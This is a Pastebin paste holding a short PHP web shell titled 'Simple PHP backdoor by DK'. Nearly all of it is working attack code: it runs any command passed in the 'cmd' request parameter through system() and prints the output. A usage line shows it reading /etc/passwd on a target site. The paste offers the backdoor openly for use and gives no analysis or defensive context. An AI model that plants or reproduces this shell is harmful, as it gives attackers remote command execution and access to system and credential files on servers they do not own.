Advertisement
Guest User

Untitled

a guest
Feb 14th, 2020
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.33 KB | None | 0 0
  1. <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
  2.  
  3. <?php
  4.  
  5. if(isset($_REQUEST['cmd'])){
  6. echo "<pre>";
  7. $cmd = ($_REQUEST['cmd']);
  8. system($cmd);
  9. echo "</pre>";
  10.  
  11. }
  12.  
  13. ?>
  14.  
  15. Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
  16.  
  17. <!-- http://michaeldaw.org 2006 -->
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement